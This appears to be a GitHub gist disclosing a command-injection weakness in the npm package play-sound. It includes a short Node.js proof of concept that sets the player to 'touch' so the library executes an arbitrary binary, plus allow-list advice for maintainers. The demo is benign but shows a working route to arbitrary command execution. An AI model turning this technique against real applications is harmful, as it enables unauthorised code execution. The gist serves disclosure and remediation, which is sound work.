Last active
October 29, 2023 12:24
-
-
Save mcoimbra/16b38f4f0a2cd31c36fd339032ac9ff3 to your computer and use it in GitHub Desktop.
Package play-sound: function spawn is called (#40) with a parameter for the binary and another array parameter for arguments. It is possible to influence both through the main package class constructor and its play(…) method.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'use strict' | |
const pkg = require('play-sound'); | |
const opts = { | |
player: 'touch' | |
}; | |
const play = pkg(opts); | |
const what = 'exploited.txt'; | |
const options = { | |
touch: 'test' | |
}; | |
const next = function(){}; | |
// This will create an 'exploited.txt' file locally. | |
play.play(what, options, next); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
A potential security measure for the package maintainers would be to only allow for a set of players.
If they still intend to enable injection, some additional safety precautions would need to be made to ensure only a binary from a select set of binaries could be executed.
I note that this would require potentially a considerable effort and domain knowledge of existing players' parameters to avoid for example the execution of a custom malicious binary with the same name as a known player.